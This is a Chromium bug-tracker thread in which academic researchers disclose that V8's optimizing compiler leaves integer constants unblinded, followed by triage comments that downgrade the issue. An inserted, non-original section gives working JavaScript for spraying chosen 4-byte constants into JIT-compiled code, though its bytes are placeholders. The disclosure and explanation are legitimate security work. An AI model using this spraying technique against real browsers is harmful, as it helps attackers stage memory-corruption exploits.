Security: Nonblinded Constants in Optimizing JS Compiler
Reported by
gimais...@gmail.com,
Feb 23 2017
Issue description

VULNERABILITY DETAILS
We, academic researchers from Saarland University, Germany, have checked the completeness of constant blinding schemes in modern browsers, including Chrome. Our goal was to see if there are still non-blinded integer constants emitted in native code. In Chrome, we found that JIT code generated by the optimizing compiler mostly contains non-blinded integer constants. This means that adversaries are able to inject arbitrary 4-byte values into JIT-compiled code, which constitutes a security risk and weakens the security guarantees of constant blinding.

VERSION
Chrome Version: 56.0.2924.87 stable.
Operating System: Windows 10, 1607.
The study was conducted on Chrome 50 on Windows 10, but is still applicable to the current version across different OSes.

REPRODUCTION CASE
Attached, see the HTML file containing simple JavaScript code that will inject eight 4-byte values sequentially into JIT-compiled code.

Although it seems like the decision not to blind integer constants in the optimizing compiler is deliberate, we still wanted to give you a heads-up about our findings. Our work was accepted at the NDSS Symposium and will be presented there on Feb 28, 2017. In the attachment, you can also find our academic paper on this topic.

Best regards,
Giorgi Maisuradze
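As an added example (not the reporter's attached HTML file, which is not reproduced on this page), the script below shows the mechanism the report describes: a byte sequence is packed into eight 4-byte little-endian integer literals, those literals are placed into a function as int32 immediates, and the function is run hot so the optimizing compiler compiles it. The placeholder bytes, the function names and the XOR-chain shape of the generated function are assumptions of this example. The script verifies only that the constants survive the round trip into source and compute correctly; confirming that the immediates actually land unblinded in the code page requires disassembling the generated machine code (V8's code-printing flags), which this script does not do.

```javascript
// Added example, not the reporter's attachment: packs a byte sequence into the
// 4-byte integer constants the report describes, generates a JS function that
// uses them as int32 immediates, and warms it up so the optimizing compiler
// compiles it. Whether the immediates land unblinded in the code page must be
// checked by disassembling the generated code; this script only prepares and
// verifies the constants.

// Pack bytes into little-endian 32-bit words, returned as signed int32 values,
// which is how they must be written as literals for int32 operations.
function packInt32LE(bytes) {
  if (bytes.length % 4 !== 0) throw new Error("need a multiple of 4 bytes");
  const words = [];
  for (let i = 0; i < bytes.length; i += 4) {
    words.push((bytes[i] | (bytes[i + 1] << 8) | (bytes[i + 2] << 16) | (bytes[i + 3] << 24)) | 0);
  }
  return words;
}

// Inverse: the byte sequence an unblinded immediate would contribute to the code page.
function unpackInt32LE(words) {
  const out = [];
  for (const w of words) {
    out.push(w & 0xff, (w >>> 8) & 0xff, (w >>> 16) & 0xff, (w >>> 24) & 0xff);
  }
  return out;
}

// Emit a function body whose only work is an int32 XOR chain over the words, so
// each word appears as a 32-bit immediate once the function is optimized
// (assumed shape; the report does not say which operation its attachment uses).
function buildSprayBody(words) {
  return words.map((w) => `x = (x ^ ${w}) | 0;`).join("\n") + "\nreturn x;";
}

function instantiate(words) {
  return new Function("x", buildSprayBody(words));
}

// Run the function hot enough that the optimizing tier takes it over.
function warmUp(fn, iterations) {
  let acc = 0;
  for (let i = 0; i < iterations; i++) acc = (acc ^ fn(i)) | 0;
  return acc;
}

// Reference result of the XOR chain, to check the generated code computes the same.
function xorChain(words, x) {
  return words.reduce((a, w) => (a ^ w) | 0, x | 0);
}

// Constructed placeholder bytes (eight 4-byte values); not a real payload.
const SAMPLE_BYTES = [
  0x90, 0x90, 0x90, 0x90, 0x41, 0x42, 0x43, 0x44,
  0x11, 0x22, 0x33, 0x44, 0xde, 0xad, 0xbe, 0xef,
  0x01, 0x02, 0x03, 0x04, 0xff, 0xfe, 0xfd, 0xfc,
  0x00, 0x00, 0x00, 0x80, 0x7f, 0x7f, 0x7f, 0x7f,
];

const SAMPLE_WORDS = packInt32LE(SAMPLE_BYTES);
const sprayed = instantiate(SAMPLE_WORDS);
warmUp(sprayed, 100000);
```

Note that the literals are signed (a word with the top bit set becomes a negative literal); writing them as unsigned values would push them out of int32 range and change how the compiler represents them. Constant blinding, when present, would replace each such immediate with a randomized value plus a fix-up operation, so the same source would no longer place the attacker-chosen bytes in the code page.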
Feb 24 2017
thx for the heads-up!
Mar 2 2017
Mar 14 2017
Issue 698944 has been merged into this issue.
Mar 14 2017
Severity medium because another flaw is required to take advantage of this. My recollection was that V8 had in the past taken steps to try to avoid this, unclear if this is a regression.
Mar 14 2017
palmer@ and jochen@ are on this from the security side. We've known that crankshaft regressed this since it originally landed. However, we finally closed that original crankshaft bug because the switch to just turbofan landed. So, with the pending removal of crankshaft, the plan is to fix this in turbofan.
Mar 15 2017
jarin: Uh oh! This issue still open and hasn't been updated in the last 19 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Mar 15 2017
Mar 30 2017
jarin: Uh oh! This issue still open and hasn't been updated in the last 34 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
May 2 2017
Friendly ping from security sheriff. jarin/jochen, is there any update here?
May 5 2017
Removing this from the security bug queue, since:
- this isn't a vulnerability itself, but something that could aid exploitation
- jit pages are rwx anyway right now, making this less useful
- the paper is public
Comment 1 by palmer@chromium.org, Feb 24 2017
Components: Blink>JavaScript>Compiler
Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows
Owner: jochen@chromium.org
Status: Assigned (was: Unconfirmed)